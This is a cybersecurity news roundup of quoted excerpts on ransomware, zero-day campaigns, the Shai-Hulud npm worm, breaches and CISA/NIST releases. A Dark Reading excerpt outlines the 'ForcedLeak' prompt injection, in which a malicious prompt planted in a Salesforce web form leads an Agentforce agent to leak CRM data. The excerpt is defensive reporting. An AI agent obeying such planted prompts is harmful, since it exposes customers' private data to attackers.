  • “This alliance could help restore LockBit’s reputation among affiliates following last year’s takedown, potentially triggering a surge in attacks on critical infrastructure and expanding the threat to sectors previously considered low risk.”

• Per Cyberscoop,
  • “Microsoft Threat Intelligence said a cybercriminal group it tracks as Storm-1175 has exploited a maximum-severity vulnerability in GoAnywhere MFT to initiate multi-stage attacks including ransomware. Researchers observed the malicious activity Sept. 11, Microsoft said in a blog post Monday.
  • “Microsoft’s research adds another substantive chunk of evidence to a growing collection of intelligence confirming the defect in Fortra’s file-transfer service was exploited as a zero-day before the company disclosed and patched CVE-2025-10035 on Sept. 18.
  • ‘Despite this mounting pile of evidence, Fortra has yet to confirm the vulnerability is under active exploitation. The company has not answered questions or provided additional information since it updated its security advisory Sept. 18 to include indicators of compromise. 
  • “Storm-1175, a financially motivated cybercrime group known for exploiting public vulnerabilities to gain access and deploy Medusa ransomware, exploited CVE-2025-10035 to achieve remote code execution, according to Microsoft.”

• Per Dark Reading,
  • “A China-based threat group known as Storm-2603 has added a new weapon to its hacking arsenal.
  • “Cisco Talos researchers observed Storm-2603 abusing Velociraptor, an open-source digital forensics and incident response (DFIR) tool, in a recent ransomware attack. The open-source project, which was acquired by Rapid7 in 2021, was designed by security researcher Michael Cohen to assist incident response teams with endpoint monitoring and investigations. However, it seems attackers have turned the tables on defenders and are now leveraging Velociraptor to conceal their malicious activity.”
  • “Storm-2603 initially burst on to the threat landscape in July as one of several threat groups exploiting a set of SharePoint vulnerabilities in an attack chain known as “ToolShell.” There, the threat actors gained access to SharePoint servers, moved laterally in the victims’ networks, and deployed Warlock ransomware. In a blog post published Thursday, Cisco Talos researchers said they responded to a different incident in August, in which threat actors dropped three different types of ransomware on the victim’s VMware ESXi servers — Warlock, LockBit, and Babuk — and caused severe disruption to the organization.
  • “In addition to the ransomware trio, Cisco Talos found Storm-2603 actors had also deployed Velociraptor to aid their attack. It was a shift in strategy; the researchers noted that the tool had not been definitively tied to ransomware attacks prior to August.”
• and
  • “Chaos ransomware has gotten a significant facelift with an “aggressive” new variant that adds destructive tactics and clipboard hijacking for cryptocurrency theft, as well as other capabilities to bolster its operations for speed and effectiveness.
  • “Researchers from FortiGuard Labs have identified a new version of Chaos ransomware written in C++, the first not written in .NET, they revealed in a report published Wednesday. This evolution also introduces a host of new features that make the ransomware harder to disrupt once it’s in execution, as well as more destructive than previous versions.
  • “This evolution underscores Chaos’s shift toward more aggressive methods, amplifying both its operational impact and the financial risk it poses to victims,” FortiGuard researcher Yen-Ting Lee wrote in the report.”

From the cybersecurity defenses front,

• Cybersecurity Dive reports,
  • “Managing cyber risk has become a point of emphasis in the insurance and asset management sector, with companies boosting annual expenditures and increasing oversight at the board level, according to a report released Wednesday by Moody’s.
  • “Almost seven of every 10 companies have a chief information security officer overseeing corporate cyber risk, while another 10% of companies have a chief information officer overseeing cybersecurity. 
  • “More than 95% of organizations have their CISOs provide briefings directly to the chief executive officer at least on a semiannual basis. This compared with 88% using that practice in 2023.
  • “In addition, seven of 10 companies have their CISO brief the corporate board of directors, at least on a semiannual basis. This compares with 54% in 2023. Four of every 10 companies link CEO compensation to the company’s cybersecurity performance, a sharp increase from just 24% in 2023.” 

• The Wall Street Journal adds,
  • “Security chiefs are emerging as sought-after advisers as companies plunge headlong into artificial intelligence.
  • “Although the rising threat of cyberattacks has elevated the role of chief information security officers in recent years, some say they are appearing more frequently before their boards and senior executives to help unpack the risks associated with AI.
  • “Often jokingly referred to as the “Department of No” inside companies, security staff are now being actively consulted on AI implementations. This includes explaining risks to management and collaborating with other parts of the business that haven’t typically worked closely with cybersecurity.
  • “Security was always thought of as the boat anchor; what I want is to be the boat motor,” said Pablo De La Rosa, vice president of information security at electric vehicle infrastructure specialist Vontier.”

• Dark Reading discusses the cyber-risks associated with AI note takers. “Transcription applications are joining your online meetings. Here’s how to create policies for ensuring compliance and security of your information.”

• Security Week notes,
  • “Google has several projects focusing on the use of AI for the discovery of vulnerabilities in software. The tech giant recently reported that its Big Sleep agent discovered a critical SQLite vulnerability and thwarted efforts to exploit it in the wild.
  • “Its latest product is CodeMender, an AI agent that not only finds security holes but also patches them. The company argues that such tools are needed because as AI gets better at discovering flaws, it will be difficult for humans to keep up with patching.” 

• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy and law enforcement front,

• Health ISAC reminds us,
  • “Despite widespread public and private interest in reauthorizing the U.S. Cybersecurity Information Sharing Act of 2015 (“CISA 2015”)[i], we are rapidly approaching September 30th, the date when the Act is set to expire barring congressional action to extend it. With time running short, let’s assess the options still being considered and breakdown how and why reauthorization is going down to the wire.” * * *
  • “The current most likely path for a CISA 2015 reauthorization is not a simple standalone bill that is quickly passed by both chambers. Instead, the most likely path runs through a short term extension as part of a continuing resolution (“CR”) and then through the National Defense Authorization Act (“NDAA”).
  • “For those who are unfamiliar, a CR is a “temporary spending [bill] that [allows] federal government operations to continue when final appropriations have not been approved by Congress and the President. Without final appropriations or a CR, there could be a lapse in funding that results in a government shutdown.”[ii] The NDAA is an annual end of year bill that provides appropriations for the Department of Defense (“DOD”). It is generally considered to be a “must pass” piece of legislation that lawmakers attempt to add otherwise unrelated policy matters.”

• Nextgov/FCW tells us,
  • “Greg Barbaccia, the federal chief information officer, says that the Office of Management and Budget is backing the General Services Administration’s overhaul of FedRAMP, the government’s cloud security assessment and authorization program. 
  • “GSA launched FedRAMP 20x — meant to use more automation in place of annual assessments, cut red tape and speed up authorizations — in March. It announced its phase two pilot on Wednesday.
  • “Barbaccia acknowledged the past problems with FedRAMP at a Wednesday event held by the Alliance for Digital Innovation. 
  • “I have done FedRAMP in my past life,” said Barbaccia, who previously worked at Palantir and more recently at a machine-learning enabled asset manager. “What a pain in the butt.”
  • “The FedRAMP program is planning on pursuing 10 pilot authorizations at the Moderate security level as part of the new phase of FedRAMP 20x, said FedRAMP Director Pete Waterman.”

• Per a Cybersecurity and Infrastructure Security Agency (“CISA”) news release,
  • Today [September 23, 2025], the Cybersecurity and Infrastructure Security Agency (CISA) announced the appointment of Stephen L. Casapulla as the Executive Assistant Director for Infrastructure Security.
  • “I am pleased to have Steve expand his role on CISA’s leadership team,” said Acting Director Madhu Gottumukkala. “With his extensive experience in critical infrastructure security and working with stakeholders, he is perfectly poised to lead our efforts in securing the nation’s critical infrastructure. I look forward to working with him on this important mission.”
  • Prior to joining CISA, Casapulla served as the Director for Critical Infrastructure Cybersecurity in the Office of the National Cyber Director. He previously spent over thirteen years at CISA and its predecessor, holding a variety of senior roles. His prior federal service includes work at the Small Business Administration and at the Department of State in Iraq. He also serves as an officer in the U.S. Navy Reserve, with over twenty years of service and multiple overseas deployments.

From the cybersecurity vulnerabilities and breaches front,

• Cybersecurity Dive reports,
  • “The Cybersecurity and Infrastructure Security Agency on Thursday [September 25, 2025,] ordered U.S. government agencies to patch multiple vulnerabilities in Cisco networking products, saying an “advanced threat actor” was using them in a “widespread” campaign.
  • “This activity presents a significant risk to victim networks,” CISA said in an emergency directive that laid out a mandatory timeline for agencies to identify, analyze and patch vulnerable devices.
  • “The hacking campaign — an extension of the sophisticated “ArcaneDoor” operation that Cisco first revealed in April 2024 — has compromised multiple federal agencies, two U.S. officials told Cybersecurity Dive. Both officials requested anonymity to discuss a sensitive and evolving investigation.”

• Cyberscoop adds,
  • “Cisco said it began investigating attacks on multiple government agencies linked to the state-sponsored campaign in May. The vendor, which attributes the attacks to the same threat group behind an early 2024 campaign targeting Cisco devices it dubbed “ArcaneDoor,” said the new zero-days were exploited to “implant malware, execute commands, and potentially exfiltrate data from the compromised devices.” 
  • “Cisco disclosed three vulnerabilities affecting its Adaptive Security Appliances — CVE-2025-20333, CVE-2025-20363 and CVE-2025-20362 — but said “evidence collected strongly indicates CVE-2025-20333 and CVE-2025-20362 were used by the attacker in the current attack campaign.” 
  • “The Cybersecurity and Infrastructure Security Agency said those two zero-days pose an “unacceptable risk” to federal agencies and require immediate action.”

• Dark Reading points out,
  • “The Cybersecurity and Infrastructure Security Agency (CISA) this week disclosed that threat actors breached a federal agency last year by exploiting a critical vulnerability in the open source GeoServer mapping server.
  • “In the advisory, CISA said it conducted incident response at a large, unnamed federal civilian executive branch (FCEB) agency after malicious activity was flagged by the agency’s endpoint detection and response (EDR) platform, but found the agency’s response playbook to be lacking; so lacking in fact that it hampered CISA’s investigation and allowed the attackers to burrow deeper into the network unchecked.

• Cybersecurity Dive adds,
  • “[On September 23, 2025,] the Cybersecurity and Infrastructure Security Agency urged security teams to monitor their systems following a massive supply chain attack that struck the Node Package Manager ecosystem. 
  • “The attack, tracked under the name Shai-Hulud, involved a self-replicating worm that compromised more than 500 software packages, according to StepSecurity. 
  • “After gaining access, a malicious attacker injected malware and scanned the environment for sensitive credentials. The credentials included GitHub Personal Access Tokens and application programming interface keys for various cloud services, including Amazon Web Services, Google Cloud Platform and Microsoft Azure. 
  • “The stolen credentials were uploaded to an endpoint controlled by the attacker and then uploaded to a public repository called Shai-Hulud. 
  • “Researchers at Palo Alto Networks said the attacker used an LLM to write the malicious script, according to an updated blog post released Tuesday.” 

• CISA added one known exploited vulnerability to its catalog this week.
  • September 23, 2025
    • CVE-2025-10585 Google Chromium V8 Type Confusion Vulnerability
      • Cybersecurity News discusses this KVE here.

• Cybersecurity Dive relates,
  • “Hackers are conducting brute force attacks against the MySonicWall.com portal in order to access the company’s cloud backup service for firewalls, SonicWall and federal authorities warned in advisories released Monday [September 22, 2025].
  • “SonicWall said its investigation found that hackers gained access to 5% of backup firewall preference files. The company warned that while credentials inside the files were encrypted, the files contained other information that could help attackers exploit the firewall, according to the advisory.  
  • “SonicWall also released a video explaining the scope of the incident. 
  • “In an advisory on Monday, the Cybersecurity and Infrastructure Security Agency urged customers to log into their accounts to determine whether their devices are at risk.” 

• Cyberscoop reports,
  • “The Secret Service said Tuesday [September 23, 2025] that it disrupted a network of electronic devices in the New York City area that posed imminent telecommunications-based threats to U.S. government officials and potentially the United Nations General Assembly meeting currently underway.
  • “The range of threats included enabling encrypted communications between threat groups and criminals or disabling cell towers and conducting denial-of-service attacks to shut down cell communications in the region. Matt McCool, special agent in charge of the Secret Service’s New York field office, said the agency’s early analysis of the network indicated “cellular communications between foreign actors and individuals that are known to federal law enforcement.”
  • “In all, the agency said it discovered more than 300 servers and 100,000 SIM cards spread across multiple sites within 35 miles of the U.N. meeting. The Secret Service announcement came the same day President Donald Trump was scheduled to deliver a speech to the General Assembly.
  • “The potential for disruption to our country’s telecommunications posed by this network of devices cannot be overstated,” U.S. Secret Service Director Sean Curran said in a news release.”

• Cyberscoop warns,
  • “Ambitious, suspected Chinese hackers with a slew of goals — stealing intellectual property, mining intelligence on national security and trade, developing avenues for future advanced cyberattacks — have been setting up shop inside U.S. target networks for exceptionally long stretches of time, in a breach that the researchers who uncovered it said could present problems for years to come.
  • “Mandiant and Google Threat Intelligence Group (GTIG) researchers described the campaign as exceptionally sophisticated, stealthy and complex, calling those behind it a “next-level threat.” But they don’t yet have a full handle on who the hackers are behind the malware they’ve dubbed Brickstorm, or how far it stretches. A blog post the company posted Wednesday sheds light on the group.
  • “The primary targets are legal services organizations and tech companies that provide security services, the researchers said. But the hackers aren’t limiting their interest to the primary targets, since they’ve used that access to infiltrate “downstream” customers. The researchers declined to describe those downstream customers or say whether U.S. federal agencies are among those targeted. A great many of them don’t know yet that they’re victims, they said.
  • “By stealing intellectual property from security-as-a-service (SaaS) firms, the hackers aim to find future zero-day vulnerabilities, a kind of vulnerability that is previously unknown and unpatched and thus highly prized, in order to enable more attacks down the line, the researchers from Mandiant and its parent company Google said.”

• Per Dark Reading,
  • “Salesforce Web forms can be manipulated by the company’s “Agentforce” autonomous agent into exfiltrating customer relationship management (CRM) data — a concerning development as legacy software-as-a-service (SaaS) providers race to integrate agentic AI into their platforms to zhuzh up the user experience and generate buzz among investors.
  • “Agentforce is an agentic AI platform built into the Salesforce ecosystem, which allows users to spin up autonomous agents for most conceivable tasks. As the story often goes though, the autonomous technology appears to be the victim of the complexity of AI prompt training, according to researchers at Noma Security. 
  • “To wit: The researchers have identified a critical vulnerability chain in Agentforce, carrying a 9.4 out of 10 score on the CVSS vulnerability-severity scale. In essence it’s a cross-site scripting (XSS) play for the AI era — an attacker plants a malicious prompt into an online form, and when an agent later processes it, it leaks internal data. In keeping with all of the other prompt injection proofs-of-concept (PoCs) coming out these days, Noma has named its trick “ForcedLeak.”

From the ransomware front,

• Cybersecurity Dive reports,
  • “RTX Corp., the parent firm of Collins Aerospace, confirmed that ransomware was used in the hack of its airline passenger processing software, in a filing with federal regulators. 
  • “The attack, discovered on Sept. 19, has disrupted flights across Europe since last week, including at London’s Heathrow Airport, Brussels Airport, and airports in Berlin and Dublin. 
  • “The Multi-User System Environment software, known as MUSE, is used by multiple airlines to check-in and board passengers and is also used to track baggage, according to the filing with the U.S. Securities and Exchange Commission. 
  • “Virginia-based RTX said the MUSE system operates on a customer-specific network outside of the company’s enterprise network.
  • “U.K. authorities said Wednesday that a man in his 40s had been arrested on suspicion of violating the Computer Misuse Act. The police investigation is ongoing.” 

• Dark Reading points out,
  • “Volvo Group North America (Volvo NA) has been breached via a third-party human resources (HR) software provider.
  • “At the root of the story is Miljödata, a Swedish company specializing in occupational software-as-a-service (SaaS), whose cloud infrastructure was breached in August. Thanks to its centralized, multi-tenant arrangement, hundreds of customers and millions of individuals have been affected. In a recent letter to its staff, Volvo NA, whose parent company is based in Sweden, revealed itself to be one such victim.
  • “Like other Miljödata customers, Volvo NA’s systems were untouched by the attack. Still, its employees’ names and Social Security numbers (SSNs) were stolen, and potentially published to the Dark Web. According to its website, Volvo NA employs just shy of 20,000 people.
  • “For municipalities, universities, and even big corporations like Volvo, this isn’t just a security issue, it’s an integrity issue,” says Anders Askasen, vice president of product marketing at Radiant Logic. “People suddenly wonder whether the systems handling their most sensitive data are fit for the purpose, and with good reason. That loss of confidence is as damaging as the leak itself.”

• Industrial Cyber tells us,
  • “The Rhysida ransomware gang claimed responsibility for a late-August data breach at the Maryland Transit Administration. Exposed data includes names, surnames, dates of birth, driver’s licenses, SSNs, passports, and confidential information.
  • “The group is said to have demanded a ransom of 30 bitcoin, around US $3.4 million at the time of writing, to be paid within seven days. To support its claim, Rhysida posted images of documents allegedly stolen from the MTA, including scans of a Social Security card, driver’s license, passport, and several other records.
  • “Comparitech identified that to prove its claim, Rhysida posted images of what it says are documents stolen from the MTA. They include scans of a Social Security card, driver’s license, passport, and several other documents. 
  • “The Maryland Transit Administration is a division of the state’s Department of Transportation. It operates buses, light rail, subways, commuter trains, taxis, and a paratransit system. The MTA specifically mentioned the paratransit system, MobilityLink, being disrupted by the cyber attack.”

• Per the Record,
  • “Ransomware hackers stole Social Security numbers, financial information and more during a recent cyberattack on Union County in Ohio. 
  • “The county government began sending out breach notifications to 45,487 local residents and county employees this week. The letters say ransomware was detected on the county’s network on May 18, prompting officials to hire cybersecurity experts and notify federal law enforcement agencies.  
  • “The hackers stole documents that had names, Social Security numbers, driver’s license numbers, financial account information, fingerprint data, medical information, passport numbers and more.  
  • “No ransomware gang has taken credit for the attack publicly, and the letters said the county has been monitoring internet sources but have not found any indication the stolen information was released or offered for sale.  
  • “The county has about 71,000 residents and is 45 minutes outside of Columbus — which dealt with its own ransomware attack one year ago.” 

• HIPAA Journal lets us know,
  • “There’s good and bad news on the ransomware front. Attacks are down year-over-year; however, successful attacks are proving even costlier to mitigate, according to the Mid-Year Risk Report from the cyber risk management company Resilience. The company saw a 53% reduction in cyber insurance claims in the first half of the year, which indicates organizations are getting better at preventing attacks; however, when ransomware attacks succeed, they have been causing increased financial harm, with losses 17% year-over-year. While ransomware accounted for just 9.6% of claims in H1, 2025, ransomware attacks accounted for 91% of incurred losses.
  • “On average, a successful ransomware attack causes $1.18 million in damages, up from $1.01 million in 2024, and the cost is even higher in healthcare. Resilience’s healthcare clients suffered average losses of $1.3 million in 2024, and in the first half of 2025, some healthcare providers faced extortion demands as high as $4 million. While it is too early to tell what the severity of claims will be in 2025 until claims are settled, Resilience said there are indications that the average severity of incurred losses for healthcare ransomware attacks this year could be $2 million, up from an average of $705,000 in 2024 and $1.6 million in 2023.”

From the cybersecurity defenses front,

• Cyberscoop advises,
  • “Artificial intelligence is no longer a future concept; it is being integrated into critical infrastructure, enterprise operations and security missions around the world. As we embrace AI’s potential and accelerate its innovation, we must also confront a new reality: the speed of cybersecurity conflict now exceeds human capacity. The timescale for effective threat response has compressed from months or days to mere seconds. 
  • “This acceleration requires removing humans from the tactical security loop. To manage this profound shift responsibly, we must evolve our thinking from abstract debates on “AI safety” to the practical, architectural challenge of “AI security.” The only way to harness the power of probabilistic AI is to ground it with deterministic controls.”

• A Dark Reading commentator recommends that “With the emergence of AI-driven attacks and quantum computing, and the explosion of hyperconnected devices, zero trust remains a core strategy for security operations.”

• Per a CISA news releases,
  • “In today’s increasingly interconnected industrial landscape, operational technology (OT) systems are no longer isolated islands of automation—they’re deeply entwined with information technology and business networks, making them prime targets for cyber threats. Recognizing this growing risk, the Cybersecurity and Infrastructure Security Agency (CISA) collaborated with three U.S. federal agencies and five international partners and received contributions from twelve private sector stakeholders to develop and publish, “Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators”.
  • “This key resource helps owners and operators of OT systems create stronger, more secure infrastructures by building a clear inventory and classification of their assets. By identifying, organizing, and managing OT assets effectively, organizations can not only improve cybersecurity but also enhance operational reliability, safety, and resilience.”

• Per National Institute of Standards news releases,
  • “NIST has released Special Publication (SP) 800-88r2 (Revision 2), Guidelines for Media Sanitization.
  • “Media sanitization is a process that renders access to the target data on media infeasible for a given level of effort. This guide will assist organizations and system owners in setting up a media sanitization program with proper and applicable methods and controls for sanitization and disposal based on the sensitivity of their information.”
• and
  • “NIST has released Special Publication (SP) 800-90C, Recommendation for Random Bit Generator (RBG) Constructions. It is the final document in the SP 800-90 series, which supports the generation of high-quality random bits for cryptographic and non-cryptographic use.
  • “SP 800-90C specifies constructions for implementing random bit generators (RBGs) that include deterministic random bit generator (DRBG) mechanisms as specified in SP 800-90A and use entropy sources as specified in SP 800-90B.”

• Here is a link to Dark Reading’s CISO Corner.